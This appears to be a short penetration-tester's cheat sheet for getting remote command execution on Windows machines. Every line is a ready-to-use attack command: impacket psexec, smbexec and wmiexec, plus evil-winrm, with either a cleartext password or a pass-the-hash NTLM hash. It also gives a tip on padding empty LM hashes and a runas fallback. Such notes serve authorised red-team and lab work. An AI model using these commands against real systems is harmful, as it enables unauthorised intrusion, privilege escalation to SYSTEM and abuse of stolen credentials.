Password available:
- PSExec (will be using nt authority/system if admin):
impacket-psexec 'domain/user:password'@IP - SMBExec:
impacket-smbexec "Domain/User:pass"@IP
(local auth put a.for domain) - WMIExec:
impacket-wmiexec domain/user:pass@IP
(local auth put a.for domain) - Evil-winrm:
evil-winrm -i targetIP -u user -p pass
Hash available:
- PSExec:
impacket-psexec -hashes aaa:bbb "Domain/User"@IP
(local auth put a.for domain) - SMBExec:
impacket-smbexec -hashes aaa:bbb "Domain/User"@IP
(local auth put a.for domain) - WMIExec:
impacket-wmiexec -hashes aaa:bbb "Domain/User"@IP
(local auth put a.for domain) - Evil-winrm (not really but put here):
evil-winrm -u user -H hash -i targetIP - If no LM hashes, can either put 32 0s (
00000000000000000000000000000000) or just use:NThash.
If everything fails, use runas /env /profile /user:domain\user "command to run"